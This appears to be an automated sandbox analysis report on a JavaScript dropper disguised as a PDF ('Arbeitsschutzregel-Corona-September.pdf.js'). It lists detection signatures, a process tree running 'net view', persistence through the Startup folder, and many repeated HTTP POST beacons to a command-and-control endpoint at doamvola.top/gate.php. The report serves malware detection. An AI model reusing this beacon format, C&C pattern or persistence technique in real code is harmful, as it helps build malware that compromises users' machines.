Analysis Report Arbeitsschutzregel-Corona-September.pdf.js

Overview

General Information

Sample Name: Arbeitsschutzregel-Corona-September.pdf.js
Analysis ID: 284446
MD5: cbb53b682fbddca875973ea4f826a1df
SHA1: 56eb48fdb6084855df9e111f481b88f1ccffbd1e
SHA256: 8e9a1693a52155ce2aa8758413e594128e3b5f3b9fb18ef2a1e4084156817443

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Drops script or batch files to the startup folder
Found C&C like URL pattern
May check the online IP address of the machine
Opens network shares
Performs a network lookup / discovery via net view
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses an obfuscated file name to hide its real file extension (double extension)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication

Startup

  • System is w7x64
  • wscript.exe (PID: 532 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 045451FA238A75305CC26AC982472367)
    • cmd.exe (PID: 2304 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad6A9FF.tmp' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • net.exe (PID: 2936 cmdline: net view MD5: 63DD6FBAABF881385899FD39DF13DCE3)
  • wscript.exe (PID: 2900 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 045451FA238A75305CC26AC982472367)
    • cmd.exe (PID: 2788 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radBF046.tmp' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • net.exe (PID: 3032 cmdline: net view MD5: 63DD6FBAABF881385899FD39DF13DCE3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Sigma detected: Net.exe Execution
Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements), Data: Command: net view , CommandLine: net view , CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad6A9FF.tmp', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2304, ProcessCommandLine: net view , ProcessId: 2936

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Arbeitsschutzregel-Corona-September.pdf.js, Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js, Avira: detection malicious, Label: JS/FileCoder.AI
Multi AV Scanner detection for domain / URL
Source: doamvola.top, Virustotal: Detection: 6%
Source: http://doamvola.top/, Virustotal: Detection: 6%
Source: http://doamvola.top/gate.php, Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: Arbeitsschutzregel-Corona-September.pdf.js, Virustotal: Detection: 40%
Source: Arbeitsschutzregel-Corona-September.pdf.js, ReversingLabs: Detection: 24%

Spreading:

Performs a network lookup / discovery via net view
Source: unknown, Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\

Networking:

Found C&C like URL pattern
Source: global traffic, HTTP traffic detected:
  POST /gate.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/json; Charset=UTF-8
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  mode: info
  uuid: 92043542-3A67-1E19-BC53-0184572EE55C
  version: Scoodle
  Content-Length: 318
  Host: doamvola.top
Source: global traffic, HTTP traffic detected:
  POST /gate.php HTTP/1.1
  Connection: Keep-Alive
  Accept: application/json
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  mode: knock
  uuid: 92043542-3A67-1E19-BC53-0184572EE55C
  version: Scoodle
  Content-Length: 0
  Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
